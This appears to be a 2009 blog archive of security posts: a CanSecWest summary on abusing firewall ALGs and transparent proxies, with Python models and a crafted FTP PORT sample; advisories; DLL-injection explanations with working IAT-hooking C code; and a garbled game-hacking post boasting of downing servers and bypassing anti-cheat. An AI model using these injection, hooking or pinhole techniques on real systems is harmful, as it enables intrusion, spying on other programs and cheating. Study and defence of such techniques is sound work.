266 posts in the 'Hacking' category

  1. 2009.03.10 Staring Into The Abyss, A Bit Before Cansec by CEOinIRVINE
  2. 2009.03.07 Apple Airport Extreme / Time Capsule Multiple Vulnerabilities by CEOinIRVINE
  3. 2009.03.04 DLL injection Wiki by CEOinIRVINE
  4. 2009.03.04 DLL Injection by CEOinIRVINE
  5. 2009.02.11 MS IE Internet Explorer Two Code Execution Vulnerabilities by CEOinIRVINE
  6. 2009.02.10 Technical Server Problem in Soldier Front By Mitch1490 by CEOinIRVINE
  7. 2009.02.10 SF Hacking (Purple Folder) by CEOinIRVINE 1
  8. 2009.02.08 How to be penetration tester? (Computer Security Specialist?) by CEOinIRVINE
  9. 2009.02.06 XSS Cheat Sheet by CEOinIRVINE
  10. 2009.02.06 CIS benchmarks by CEOinIRVINE

Staring Into The Abyss, A Bit Before Cansec

I'm just going to come out and say it: I miss packet craft. Sure, we can always pull out Scapy and slap amusing packets together, but everything interesting is always at the other layers.

Or is it?

For CanSecWest this year, I thought it'd be interesting to take a look at the realm of Deep Packet Inspectors. It turns out we were doing a lot of this around 2000 through 2002, and then... well, sort of stopped. So, in this year's CanSecWest paper, "Staring Into The Abyss: Revisiting Browser v. Middleware Attacks In The Era Of Deep Packet Inspection" (DOC, PDF), I'm taking another crack at the realm, and I'm seeing really interesting capabilities to fingerprint, bypass, and otherwise manipulate systems that watch from the middle of networks, using protocol emulation abilities that have been part of browsers and their plugin ecosystem from the very beginning.

Ah, but here's where I need some help. I've worked pretty closely with Robert Auger from Paypal, who just published his own paper, "Socket Capable Browser Plugins Result In Transparent Proxy Abuse". We independently discovered the HTTP component of this attack pattern, and as I describe in my paper, we've kind of forgotten just how much can be done against Active FTP Application Layer Gateways.

So, if I may ask, take a look, check out my paper, and if you have some thoughts, corrections, or interesting techniques, let me know so I can integrate them into my CanSecWest presentation. Here's the full summary, to whet your appetite:

DPI — Deep Packet Inspection — technology is driving large amounts of intelligence into the infrastructure, parsing more and more context from data flows going past. Though this work may be necessary to support important business and even security requirements, we know from the history of security that to parse data is to potentially be vulnerable to that data – especially when the parser is designed to extract context as quickly as possible. Indeed, companies such as BreakingPoint and Codenomicon have made their names building test tools to expose potential faults with DPI engines. But could anyone actually trigger these vulnerabilities? In this paper, we restart an old line of research from several years ago: The use of in-browser technologies to “tweak” Deep Packet Inspection systems.

Essentially, by controlling both endpoints surrounding a DPI system, possibly using the TCP (and sometimes UDP) socket code that plugins add to browsers, what behavior can we extract? We find three lines of attack worth noting.

First, firewalls and NATs, the most widely deployed packet inspectors on the Internet today, can still be made to open holes to the Internet by having the browser trigger the Application Layer Gateway (ALG) for protocols like Active FTP: the ALG sees a PORT command in the client's stream and opens a pinhole back to the address and port that command names. We extend older work in three ways: we integrate mechanisms for acquiring the correct internal IP address of a client, which many inspection engines require before they will act; we survey other protocols, such as SIP and H.323, that have their own inspection engines; and we explore better strategies for triggering these vulnerabilities without the socket engines of browser plugins. We also explore a potentially new mechanism, "Window Dribbling", that converts an HTTP POST from a browser into a full bidirectional conversation by letting the remote sender "dribble" only a fixed number of bytes per segment.
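The Active FTP case can be modelled compactly. What follows is an added example, not code from the paper or from its firewall fingerprinter: a Python model of a line-oriented FTP ALG that pulls PORT commands out of whatever the client sends on a port-21 connection, whether an FTP client, a plugin socket or an HTTP POST body produced the bytes, and decides whether to open a pinhole. The strict variant applies the two checks a careful ALG makes, that the advertised address equals the connection's own source (which is why the attacker needs the client's real internal IP) and that the port is unprivileged; the permissive variant trusts the PORT line as-is. The request bytes and addresses are constructed sample data.

```python
import re

# Hypothetical model of a line-oriented Active FTP ALG (example code, not the
# paper's tool). A PORT argument is h1,h2,h3,h4,p1,p2: four address octets
# followed by the data port split into high and low bytes.
PORT_RE = re.compile(rb"^PORT\s+(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$")


def parse_port(line):
    """Decode one PORT command line to (ip, port); None if it is not a well-formed PORT."""
    m = PORT_RE.match(line.strip())
    if m is None:
        return None
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        return None
    return ".".join(str(n) for n in nums[:4]), nums[4] * 256 + nums[5]


def alg_pinhole(line, conn_src_ip, strict=True):
    """Decide whether the ALG would open a server->client pinhole for this line.

    strict=False models a permissive ALG that trusts whatever address the PORT
    names. strict=True models the checks a careful ALG applies: the address must
    be the connection's own source (so the attacker must know the client's real
    internal IP) and the port must not be a privileged service port.
    """
    parsed = parse_port(line)
    if parsed is None:
        return None
    ip, port = parsed
    if strict and (ip != conn_src_ip or port < 1024):
        return None
    return ip, port


def scan_client_stream(data, conn_src_ip, strict=True):
    """Scan every CRLF-terminated line the client sends on a port-21 connection.

    The ALG neither knows nor cares whether the bytes came from a real FTP
    client, a plugin socket, or an HTTP POST body a browser was induced to send:
    a PORT line buried in a POST is handled exactly like one from an FTP client.
    """
    holes = []
    for line in data.split(b"\r\n"):
        hole = alg_pinhole(line, conn_src_ip, strict)
        if hole is not None:
            holes.append(hole)
    return holes


# Constructed sample: a browser POST aimed at an attacker-run listener on port 21.
# Only the body line means anything to the ALG.
SAMPLE_POST = (
    b"POST /upload HTTP/1.1\r\n"
    b"Host: attacker.example\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 23\r\n"
    b"\r\n"
    b"PORT 192,168,1,10,4,0\r\n"
)

if __name__ == "__main__":
    for strict in (False, True):
        label = "strict" if strict else "permissive"
        print(label, scan_client_stream(SAMPLE_POST, "192.168.1.10", strict))
    print("wrong internal IP, strict:", scan_client_stream(SAMPLE_POST, "192.168.1.11", True))
```

The permissive ALG opens 192.168.1.10:1024 no matter who sent the line; the strict one opens it only when the connection really comes from 192.168.1.10, and it refuses a PORT naming a privileged port such as 22 even from the right source.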

Second, we (along with Robert Auger at Paypal) find that transparent HTTP proxies, such as Squid, will “override” the intended destination of browser sockets, allowing a remote attacker to send and receive data from arbitrary web sites. This allows (at minimum) extensive and expensive click fraud attacks, and may expose internal connectivity as well (HTTP or even TCP).
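A model of the transparent-proxy problem and of its fix, added here as an example rather than taken from the paper or from Squid: the naive proxy routes by the Host header, so a plugin socket opened to the attacker's own server but carrying "Host: bank.example" is forwarded to the bank from the victim's address; the hardened proxy requires the Host to resolve to the address the client actually connected to and refuses anything else (Squid's host_verify_strict option implements this check). DEMO_DNS, the hostnames and the addresses are constructed data.

```python
# Hypothetical model of destination selection in a transparent (intercepting)
# HTTP proxy; example code, not Squid's. DEMO_DNS stands in for the proxy's
# resolver and is constructed data (IPv4 only in this model).
DEMO_DNS = {
    "bank.example": "203.0.113.10",
    "attacker.example": "198.51.100.7",
}


def parse_request(request):
    """Return (method, path, host) from a raw HTTP/1.x request; host is None if absent."""
    head = request.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    host = None
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"host":
            # drop an explicit :port; IPv6 literals are out of scope for this model
            host = value.strip().decode("ascii").rsplit(":", 1)[0]
            break
    return method.decode("ascii"), path.decode("ascii"), host


def choose_upstream(orig_dst_ip, request, resolver=DEMO_DNS, hardened=False):
    """Pick where the proxy forwards a request it intercepted en route to orig_dst_ip.

    hardened=False: the classic behaviour, route by the Host header. A plugin
    socket opened to the attacker's own server but carrying "Host: bank.example"
    is then forwarded to the bank, with the victim's source address.
    hardened=True: the Host must resolve to the address the client actually
    connected to; a mismatch is refused rather than re-routed.
    Returns (action, upstream_ip, host) with action "forward" or "reject".
    """
    _method, _path, host = parse_request(request)
    if host is None:
        return ("reject", orig_dst_ip, None)
    resolved = resolver.get(host)
    if not hardened:
        return ("forward", resolved or orig_dst_ip, host)
    if resolved != orig_dst_ip:
        return ("reject", orig_dst_ip, host)
    return ("forward", orig_dst_ip, host)


# Constructed requests. Both arrive on a TCP connection whose original destination
# was the attacker's server, 198.51.100.7; only the Host header differs.
FORGED = b"GET /account/transfer HTTP/1.1\r\nHost: bank.example\r\n\r\n"
HONEST = b"GET /index.html HTTP/1.1\r\nHost: attacker.example\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("honest", HONEST)):
        print(name, "naive:", choose_upstream("198.51.100.7", req))
        print(name, "hardened:", choose_upstream("198.51.100.7", req, hardened=True))
```

The naive proxy turns a socket the attacker was allowed to open (to his own host) into a request to bank.example carrying the victim's IP, which is the click-fraud and internal-connectivity exposure described above; the hardened proxy forwards only when Host and original destination agree.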

Third, and most interestingly, we find that active DPIs (those that actually alter the flow of traffic between a client and a server) all seem to expose subtly different parsers and handlers for the protocols they manipulate. These behavioral variations can be fingerprinted remotely, allowing an attacker to identify the DPI platform and target his attacks at it precisely. This capability, understood particularly in light of Felix Lindner's recent work on generic attacks against Cisco infrastructure, underscores the need both for DPI vendors to test their platforms extensively and for IT managers to deploy critical infrastructure patches with at least as much vigor as desktop support receives today.

For remediation purposes, we recommend two lines of defense, one policy and one technical. As a matter of policy, the most important recommendation of this paper is that industry reconsider its patching policies as they apply to infrastructure, especially as that infrastructure starts inspecting traffic at ever higher speeds in ever deeper ways. We are actively concerned that administrators have internalized the need to patch endpoints, but are not closely tracking the equipment that binds endpoints together, despite its ever increasing intelligence. This is as much a recommendation to vendors, to build patches quickly and to code-audit and fuzz with software from companies like BreakingPoint and Codenomicon, as it is a plea to IT departments to deploy the patches that are generated. Also from a policy perspective, while this paper recognizes the need for judicious use of DPI technology, systems that are deployed across organizational boundaries have a particular need for correctness: there have been incidents in the past that have led to security vulnerability across entire ISPs.

On the technical front, we defend the existence of socket functionality in the browser, recognizing that constraining all networking to what existed in 2001 is not leading to more stable or more secure networks. We explore a solution that would let firewalls integrate socket policies into their ALGs, encouraging plugin developers to eventually join browser manufacturers in building a single, coherent, cross-domain communication standard. We also discuss more advanced transparent proxy caching policies, which prevent the Same Origin Policy bypasses discussed above. Finally, we remind home router developers that browsers are still able to reach their web interfaces from the Internet, and that this exposure can be closed by tying the effectiveness of the default password to either a button on the device or a power cycle.

The firewall fingerprinter should be online shortly, with source code for you to play with as well.  Thanks!

(Incidentally, yep, Source is this week, and I have something rather different in store for that event.  The times, they are busy.)

Posted by CEOinIRVINE


TITLE:
Apple Airport Extreme / Time Capsule Multiple Vulnerabilities

SECUNIA ADVISORY ID:
SA34105

VERIFY ADVISORY:
http://secunia.com/advisories/34105/

DESCRIPTION:
Some vulnerabilities have been reported in Apple Airport Extreme and
Time Capsule, which can be exploited by malicious people to conduct
spoofing attacks, disclose potentially sensitive information, or to
cause a DoS (Denial of Service).

1) An error exists in the implementation of the Neighbor Discovery
protocol when processing Neighbor Discovery messages.

For more information:
SA32112

2) An unspecified error exists in the handling of PPPoE discovery
packets, which can be exploited to cause an out-of-bounds memory
access by sending a specially crafted PPPoE discovery packet.

3) An error exists in the handling of incoming ICMPv6 "Packet Too
Big" messages, which can be exploited to shutdown the device.

This is related to:
SA31745

SOLUTION:
Update to firmware version 7.4.1.

PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.

ORIGINAL ADVISORY:
HT3467:
http://support.apple.com/kb/HT3467


DLL injection Wiki

Hacking 2009. 3. 4. 05:16

DLL injection

From Wikipedia, the free encyclopedia


In computer programming, DLL injection is a technique used to run code within the address space of another process by forcing it to load a dynamic-link library.[1] DLL injection is often used by third-party developers to influence the behavior of a program in a way its authors did not anticipate or intend.[1][2][3] For example, the injected code could trap system function calls,[4][5] or read the contents of password textboxes, which cannot be done the usual way.[6]

Approaches on Microsoft Windows

There are at least four ways to force a program to load a DLL on Microsoft Windows:

  • DLLs listed under the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs will be loaded into every process that links to User32.dll as that DLL attaches itself to the process.[7][8][9][5]
  • Process manipulation functions such as CreateRemoteThread can be used to inject a DLL into a program after it has started.[10][11][12][13][6][5]
    1. A handle to the target process is obtained, this can be done by spawning the process[14][15] or by keying off something created by that process that is known to exist – for instance, a window with a predictable title,[16] or by obtaining a list of running processes[17] and scanning for the target executable's filename.[18]
    2. Some memory is allocated in the target process,[19] and the name of the DLL to be injected is written to it.[20][10]
      This step can be skipped if a suitable DLL name is already available in the target process. For example, if a process links to ‘User32.dll’, ‘GDI32.dll’, ‘Kernel32.dll’ or any other library whose name ends in ‘32.dll’, it would be possible to load a library named ‘32.dll’. This technique has in the past been demonstrated to be effective against a method of guarding processes against DLL injection.[21]
    3. A new thread is created in the target process,[22] with the thread's start address set to be the address of LoadLibrary and the argument set to the address of the string just uploaded into the target.[23][10]
      Instead of writing the name of a DLL to load to the target and starting the new thread at LoadLibrary, one can of course also write the code to be executed itself to the target and start the thread at that code.[6]
    4. The operating system will now call DllMain in the injected DLL.[24][10]
    Note that without precautions, this approach can be detected by the target process due to the DLL_THREAD_ATTACH notifications sent to every loaded module as a thread starts.[24]
  • Windows hooking calls such as SetWindowsHookEx.[25][26][27][6][2][5]
  • Use the debugging functions to pause all threads, and then hijack an existing thread in the application to execute injected code, that in turn could load a DLL.[28][29][4]

Approaches on Unix-like systems

On Unix-like operating systems whose dynamic linker is based on ld.so (BSD) or ld-linux.so (Linux), arbitrary libraries can be linked into a new process by giving the library's pathname in the LD_PRELOAD environment variable, which can be set globally or for a single process.[30]

For example, this command launches "prog --help" with the shared library from the file "test.so" linked into it at launch time:

LD_PRELOAD="./test.so" prog --help

Such a library can be created with GCC by compiling the source file containing the new globals to be linked with the -fpic or -fPIC option,[31] and linking with the -shared option.[32] The library has access to the external symbols declared in the program like any other library, and because it is loaded first, any function it defines takes precedence over the same-named function in libraries loaded later.


DLL Injection

Hacking 2009. 3. 4. 05:09

Introduction

The source files rely heavily on function pointers; an overview of them is recommended before reading on.

DLL injection amounts to 'injecting' code into an already running process. Much of this is taken from Matt Pietrek's book Windows 95 System Programming Secrets.

Function interception means hooking an API function imported from an implicitly (statically) linked DLL by overwriting that function's entry in the import address table, so that the application calls your 'intercepting' function instead of the original 'intercepted' one. This is the same idea as Wade Brainerd's article "APIHijack - A Library for easy DLL function hooking".

DLL Injection

"DLL Injection" is not quite an accurate name for what this code does. It 'injects' a short block of assembled machine instructions into some free space in the running process and redirects a thread's registers to the offset of the injected code. The process then executes those instructions, which load a certain DLL, the DLL being injected. Note that what is injected is code: it can be anything and does not have to load a DLL at all. Hence the inaccurate title.

There are two ways to write a block of bytes into an already running process. VirtualAllocEx(), which is not available on Win9x/ME, lets a process reserve or commit a region of memory within the virtual address space of another process; WriteProcessMemory() then writes the code into that region. The other way, which works on every version of Windows, is to use ReadProcessMemory() and WriteProcessMemory() directly: find an accessible area of the target's memory at least as large as the code and overwrite it, keeping a backup of the original bytes so they can all be put back later.

(CreateRemoteThread() would do all of this in one call, but it too is not supported on every version of Windows.)

One reliable, if slow, way to run the injected code is through the Windows debugging API. Attach to the process so that its threads are suspended, use GetThreadContext() to save a backup of a thread's registers, then use SetThreadContext() to point its EIP, the register holding the address of the next instruction to execute, at the injected code. The injected block ends with a breakpoint (int 3). Resume the threads with the debugging functions; the thread runs the injected code until it reaches that breakpoint, which is delivered to your application as a debug event. Once you receive that notification, restore the overwritten bytes and/or free any memory you allocated, and finally restore the saved registers with SetThreadContext(). That's all there is to it. The application has no idea what happened: the code ran, and probably loaded a DLL. Since a loaded DLL lives in the application's address space, it can read and write all of that memory and control the whole application. Very interesting.

Look up the MSDN library for more information (MSDN).

Useful points to look up:

  1. Memory management: you need to know how Windows manages its memory.
  2. How DLLs work (MSDN): worth reading, even as a refresher.
  3. The PE/COFF header specification (MSDN): the most important piece if you are doing this on Win9x/ME.
  4. The basic debugging APIs, which let you debug other applications: see the section "Debugging and Error Handling" in MSDN.
  5. Enough knowledge of assembly, including the opcodes of the instructions you inject.

Have a look at the accompanying files: Injector_src.zip.

---

Google Groups: a message board thread on the CreateRemoteThread() method.

Function Interception

Notice the DLL project in the zip file. The following function is in HookApi.h.

// Macro for adding a pointer and an offset without C pointer arithmetic
// scaling the offset -- taken from Matt Pietrek's book. Thought it'd be great
// to use. (32-bit builds; use DWORD_PTR instead of DWORD on x64.)
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (DWORD)(addValue) )

// This code is very similar to Matt Pietrek's, except that it is written
// according to my understanding. Pietrek's version also handles Win32s,
// which has some problems of its own.
PROC WINAPI HookImportedFunction(HMODULE hModule,     // Module to intercept calls from
                                 PSTR FunctionModule, // DLL that exports the function to hook (e.g. "USER32.dll")
                                 PSTR FunctionName,   // Function to hook (e.g. "MessageBoxA")
                                 PROC pfnNewProc)     // New function; this gets called instead
{
    PROC pfnOriginalProc;           // The intercepted function's original address
    IMAGE_DOS_HEADER *pDosHeader;
    IMAGE_NT_HEADERS *pNTHeader;
    IMAGE_IMPORT_DESCRIPTOR *pImportDesc;
    IMAGE_THUNK_DATA *pThunk;
    DWORD dwOldProtect;

    // Verify that a valid function pointer was passed
    if ( IsBadCodePtr(pfnNewProc) ) return 0;

    // Resolve the real entry point; this is the value the loader wrote into the IAT
    pfnOriginalProc = GetProcAddress(GetModuleHandle(FunctionModule), FunctionName);
    if ( !pfnOriginalProc ) return 0;

    // hModule is the base address of the module image. For the hooked process
    // that is GetModuleHandle(0); even when called from inside the injected DLL,
    // GetModuleHandle(0) returns the host process's base, not the DLL's. If you
    // need the DLL's own hInstance, save it in a global from DllMain(); that is
    // the only place you get it.
    pDosHeader = (PIMAGE_DOS_HEADER)hModule;

    // Make sure we're looking at a module image (the 'MZ' header)
    if ( IsBadReadPtr(pDosHeader, sizeof(IMAGE_DOS_HEADER)) ) return 0;
    if ( pDosHeader->e_magic != IMAGE_DOS_SIGNATURE )  // WORD: 'M', 'Z'
        return 0;

    // e_lfanew is the RVA (offset relative to the module base) of the 'PE\0\0'
    // header, so base + e_lfanew is its virtual address
    pNTHeader = MakePtr(PIMAGE_NT_HEADERS, pDosHeader, pDosHeader->e_lfanew);

    // More tests to make sure we're looking at a "PE" image
    if ( IsBadReadPtr(pNTHeader, sizeof(IMAGE_NT_HEADERS)) ) return 0;
    if ( pNTHeader->Signature != IMAGE_NT_SIGNATURE )  // DWORD: 'P', 'E', '\0', '\0'
        return 0;

    // Get out if the module has no import table at all. (Pietrek's original
    // compared pImportDesc against pNTHeader here, but an RVA of 0 yields
    // pDosHeader, not pNTHeader, so that test could never fire.)
    if ( pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress == 0 )
        return 0;

    // The imports section is base + the import directory's RVA.
    // IMAGE_DIRECTORY_ENTRY_IMPORT == 1; see the PE documentation and
    // Pietrek's MSJ / MSDN Magazine articles.
    pImportDesc = MakePtr(PIMAGE_IMPORT_DESCRIPTOR, pDosHeader,
                          pNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

    // Iterate through the array of import descriptors, looking for the one whose
    // DLL name matches FunctionModule. Name is an RVA to the DLL name string;
    // compare case-insensitively (stricmp()/strcmpi() on older compilers).
    while ( pImportDesc->Name )
    {
        PSTR pszModName = MakePtr(PSTR, pDosHeader, pImportDesc->Name);
        if ( _stricmp(pszModName, FunctionModule) == 0 )
            break;
        pImportDesc++;  // Advance to the next imported module descriptor
    }

    // The terminating descriptor has Name == 0: this module doesn't import that DLL
    if ( pImportDesc->Name == 0 ) return 0;

    // FirstThunk is the RVA of this DLL's import address table (IAT). In the
    // mapped image the entries are function addresses; in the disk file they
    // still mirror the name table until the loader resolves them.
    pThunk = MakePtr(PIMAGE_THUNK_DATA, pDosHeader, pImportDesc->FirstThunk);

    // Look through the IAT of the found DLL for the entry that matches the
    // address we got back from GetProcAddress above
    while ( pThunk->u1.Function )
    {
        if ( (DWORD)pThunk->u1.Function == (DWORD)pfnOriginalProc )
        {
            // We found it. The IAT is read-only once the loader is done, so make
            // the slot writable, overwrite it with the interception function and
            // restore the protection. Return the original address to the caller
            // so that they can chain on to it.
            if ( !VirtualProtect(&pThunk->u1.Function, sizeof(pThunk->u1.Function),
                                 PAGE_READWRITE, &dwOldProtect) )
                return 0;
            pThunk->u1.Function = (PDWORD)pfnNewProc;
            VirtualProtect(&pThunk->u1.Function, sizeof(pThunk->u1.Function),
                           dwOldProtect, &dwOldProtect);
            return pfnOriginalProc;
        }
        pThunk++;   // Advance to the next imported function address
    }

    return 0; // Function not found in this module's IAT
}
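To make the import-table walk above concrete without a Windows box, here is an added Python example (not the article's code) that builds a minimal PE32 image in memory, laid out as the loader leaves a mapped module with a resolved IAT, and performs the same walk HookImportedFunction does: MZ check, e_lfanew to the PE header, import directory from DataDirectory[1], descriptor lookup by DLL name, then a scan of that DLL's FirstThunk array for the entry equal to the resolved address, which it overwrites. The image, the export addresses and the DEMO_EXPORTS stand-in for GetProcAddress are constructed data; an empty import table is detected by testing the directory RVA for zero.

```python
import struct

# Layout constants from the PE/COFF specification (PE32, i.e. 32-bit images).
DOS_E_LFANEW = 0x3C                 # offset of e_lfanew in IMAGE_DOS_HEADER
FILE_HEADER_SIZE = 20               # sizeof(IMAGE_FILE_HEADER)
OPT_HDR_DATADIR = 96                # DataDirectory[] offset inside a PE32 optional header
IMAGE_DIRECTORY_ENTRY_IMPORT = 1
IMPORT_DESC_SIZE = 20               # sizeof(IMAGE_IMPORT_DESCRIPTOR)
IMPORT_DESC_NAME = 12               # offset of the Name RVA inside the descriptor
IMPORT_DESC_FIRST_THUNK = 16        # offset of the FirstThunk (IAT) RVA

# Stand-in for GetProcAddress: what the loader resolved each import to. Hypothetical values.
DEMO_EXPORTS = {
    ("user32.dll", "MessageBoxA"): 0x77D5050B,
    ("user32.dll", "GetDC"): 0x77D6ABCD,
    ("kernel32.dll", "LoadLibraryA"): 0x7C801D7B,
    ("kernel32.dll", "GetTickCount"): 0x7C80932E,
    ("kernel32.dll", "CreateFileA"): 0x7C801A28,   # exported, but not imported by the demo image
}


def build_demo_image():
    """Construct a minimal PE32 image as it looks once mapped and resolved (test data).

    One section whose virtual and raw addresses coincide, so every RVA is also a
    byte offset into the buffer, and an IAT that already holds function
    addresses, as the Windows loader leaves it.
    """
    img = bytearray(0x600)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, DOS_E_LFANEW, 0x40)
    img[0x40:0x44] = b"PE\0\0"
    # IMAGE_FILE_HEADER: Machine=i386, 1 section, SizeOfOptionalHeader=0xE0, Characteristics
    struct.pack_into("<HHIIIHH", img, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    opt = 0x44 + FILE_HEADER_SIZE                       # optional header at 0x58
    struct.pack_into("<H", img, opt, 0x10B)             # PE32 magic
    struct.pack_into("<I", img, opt + 92, 16)           # NumberOfRvaAndSizes
    struct.pack_into("<II", img, opt + OPT_HDR_DATADIR + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT,
                     0x200, 3 * IMPORT_DESC_SIZE)       # import directory RVA and size
    img[0x300:0x30B] = b"USER32.dll\0"
    img[0x310:0x31D] = b"KERNEL32.dll\0"
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    struct.pack_into("<IIIII", img, 0x200, 0x400, 0, 0, 0x300, 0x500)   # USER32
    struct.pack_into("<IIIII", img, 0x214, 0x410, 0, 0, 0x310, 0x510)   # KERNEL32
    # the all-zero descriptor at 0x228 terminates the list
    # IATs: resolved addresses, zero-terminated
    struct.pack_into("<III", img, 0x500, 0x77D5050B, 0x77D6ABCD, 0)     # MessageBoxA, GetDC
    struct.pack_into("<III", img, 0x510, 0x7C801D7B, 0x7C80932E, 0)     # LoadLibraryA, GetTickCount
    return img


def _cstr(img, off):
    return bytes(img[off:img.index(b"\0", off)]).decode("ascii")


def _u32(img, off):
    return struct.unpack_from("<I", img, off)[0]


def hook_imported_function(img, module, func_name, new_addr, exports=DEMO_EXPORTS):
    """Python rendering of the HookImportedFunction walk: returns the original
    address on success and 0 on any failure, mirroring the C function's contract."""
    original = exports.get((module.lower(), func_name))       # GetProcAddress
    if not original:
        return 0
    if bytes(img[0:2]) != b"MZ":                               # IMAGE_DOS_SIGNATURE
        return 0
    nt = _u32(img, DOS_E_LFANEW)
    if bytes(img[nt:nt + 4]) != b"PE\0\0":                     # IMAGE_NT_SIGNATURE
        return 0
    opt = nt + 4 + FILE_HEADER_SIZE
    if struct.unpack_from("<H", img, opt)[0] != 0x10B:         # PE32 only in this model
        return 0
    import_rva = _u32(img, opt + OPT_HDR_DATADIR + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT)
    if import_rva == 0:                                         # no import table at all
        return 0
    desc = import_rva
    while True:                                                 # descriptor for `module`
        name_rva = _u32(img, desc + IMPORT_DESC_NAME)
        if name_rva == 0:
            return 0                                            # terminator: DLL not imported
        if _cstr(img, name_rva).lower() == module.lower():
            break
        desc += IMPORT_DESC_SIZE
    slot = _u32(img, desc + IMPORT_DESC_FIRST_THUNK)            # first IAT entry for that DLL
    while True:
        entry = _u32(img, slot)
        if entry == 0:
            return 0                                            # end of IAT: function not imported
        if entry == original:
            struct.pack_into("<I", img, slot, new_addr)         # the hook: patch the IAT slot
            return original
        slot += 4


def iat_entries(img, module):
    """Read back one DLL's IAT (addresses in order) so a hook can be verified; [] if absent."""
    opt = _u32(img, DOS_E_LFANEW) + 4 + FILE_HEADER_SIZE
    desc = _u32(img, opt + OPT_HDR_DATADIR + 8 * IMAGE_DIRECTORY_ENTRY_IMPORT)
    if desc == 0:
        return []
    while _u32(img, desc + IMPORT_DESC_NAME):
        if _cstr(img, _u32(img, desc + IMPORT_DESC_NAME)).lower() == module.lower():
            slot, out = _u32(img, desc + IMPORT_DESC_FIRST_THUNK), []
            while _u32(img, slot):
                out.append(_u32(img, slot))
                slot += 4
            return out
        desc += IMPORT_DESC_SIZE
    return []


if __name__ == "__main__":
    image = build_demo_image()
    print("before:", [hex(a) for a in iat_entries(image, "USER32.dll")])
    print("hooked, original was", hex(hook_imported_function(image, "USER32.dll", "MessageBoxA", 0x10001000)))
    print("after: ", [hex(a) for a in iat_entries(image, "USER32.dll")])
```

Only the slot whose value equals the resolved address is touched; a function that the module does not import, or a DLL that is not in its descriptor list, leaves the image unchanged and yields 0, exactly the cases the C version returns 0 for.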

Also notice:

  • HANDLE OpenLog(char *Filename)
  • BOOL CloseLog(HANDLE h)
  • DWORD AppendLog(char *str, DWORD uSize, HANDLE h)

These are the functions that write the log file. What the whole project does is inject a DLL into an already running process (in my case mIRC.exe, the mIRC chat client). The DLL then writes a log of every intercepted Winsock function; see Successlog.txt for a sample. It is highly recommended that you apply the program to mIRC only, since it was written for it. Have fun coding your own :)

I think you got the idea. I hope this is useful.

Regards,



TITLE:
Microsoft Internet Explorer Two Code Execution Vulnerabilities

SECUNIA ADVISORY ID:
SA33845

VERIFY ADVISORY:
http://secunia.com/advisories/33845/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
From remote

SOFTWARE:
Microsoft Internet Explorer 7.x
http://secunia.com/advisories/product/12366/

DESCRIPTION:
Two vulnerabilities have been reported in Microsoft Internet
Explorer, which can be exploited by malicious people to compromise a
user's system.

1) An unspecified error exists due to the use of a previously deleted
object (a use-after-free). This can be exploited to corrupt memory and
execute arbitrary code when a user e.g. visits a malicious web site.

2) An unspecified error exists within the handling of Cascading Style
Sheets (CSS). This can be exploited to cause a memory corruption and
execute arbitrary code when a user e.g. visits a specially crafted
web site.

SOLUTION:
Apply patches.

Windows XP SP2/SP3:
http://www.microsoft.com/downloads/details.aspx?familyid=8cd902ec-e018-4b61-80f9-825d973f998e

Windows XP Professional x64 Edition (optionally with SP2):
http://www.microsoft.com/downloads/details.aspx?familyid=dd3e2236-9cc0-478e-a46c-981ef685c0e3

Windows Server 2003 SP1/SP2:
http://www.microsoft.com/downloads/details.aspx?familyid=e52aa1fd-e694-4322-b3ff-6abc1b4a16fe

Windows Server 2003 x64 Edition (optionally with SP2):
http://www.microsoft.com/downloads/details.aspx?familyid=edbf1566-b96b-4c7d-98fe-b15f8e766792

Windows Server 2003 with SP1/SP2 for Itanium-based systems:
http://www.microsoft.com/downloads/details.aspx?familyid=5ce78797-d1c0-40d4-84e1-1004389833be

Windows Vista (optionally with SP1):
http://www.microsoft.com/downloads/details.aspx?familyid=5f9fa4b6-85a4-43bc-b84f-6bd847799650

Windows Vista x64 Edition (optionally with SP1):
http://www.microsoft.com/downloads/details.aspx?familyid=e9a8c94b-b9d2-4d64-855f-b5f02ce3dfb5

Windows Server 2008 for 32-bit Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=2491dbf2-7cd3-44f1-bfad-77e6f760a25c

Windows Server 2008 for x64-based Systems:
http://www.microsoft.com/downloads/details.aspx?familyid=794373cc-2dce-4ef5-af50-7804c622c230

Windows Server 2008 for Itanium-based systems:
http://www.microsoft.com/downloads/details.aspx?familyid=11985325-4b33-4077-82cf-6afc7a71c510

PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Zero Day Initiative
2) Sam Thomas via Zero Day Initiative.

ORIGINAL ADVISORY:
MS09-002 (KB961260):
http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx

Technical Server Problem in Soldier Front By Mitch1490

After My Success EMU HUL Method Of Serving The Game Soldier Front To Bypass For Private Freeself Thoughts.

\\ CODERS PLEASE READ TO HAVE THE KNOWLEDGE OF THE GAME'S CDN AND FOR EXAMPLES I USED
// SOLDIER FRONT

TRUE this SF Server Downer I Probably Made IJJI Server Down For All Games. Sorry~

LOOK AT THIS AND TELL ME WHO DID:
Purple Folder for GG server by Mitch1490

//-USED TO MAKE BYPASS PURPLEBEAN.EXE OF GAMEGUARD.
